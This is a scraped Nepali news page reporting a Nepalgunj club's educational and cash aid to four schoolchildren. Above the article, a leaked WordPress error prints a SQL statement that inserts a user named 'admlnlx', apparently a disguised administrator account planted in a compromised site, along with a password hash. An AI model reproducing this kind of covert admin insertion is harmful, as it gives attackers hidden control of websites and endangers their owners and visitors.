WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZrW6O1YQw7SN9O.xiZLiUUjMp3mTt/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:47:08', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ ११ –
पारिवारिक समस्याले बिचल्लीमा परेका विद्यालय अध्ययनरत चार बालबालिकालाई बागेश्वरी असल शासन क्लबले शैक्षिक तथा आर्थिक सहयोग उपलब्ध गराएको छ ।
क्लबले बाँके जिल्ला टिटिहिरिया गाविसस्थित श्री माध्यमिक विद्यालयको कक्षा ३ र ४ मा अध्ययनरत नवराज थारु र कृष्ण थारुलाई विद्यालय ब्याग, रु पाँच हजार बराबरको स्टेशनरी तथा नगद रु तीन हजार उपलब्ध गराएको छ ।
त्यसैगरी, नेपालगन्जस्थित बागेश्वरी मन्दिरमा मागेर जीविकोपार्जन गर्ने रामशिला विकका छोरा राजकुमार विक र बिनिता विकको अध्ययनका लागि नगद रु ६ हजार उपलब्ध गराएको छ ।
सो सहयोग क्लबका कार्यकारी निर्देशक नमस्कार शाह र कार्यक्रम संयोजक विनाद शर्माले प्रदान गर्नुभएको हो । – रासस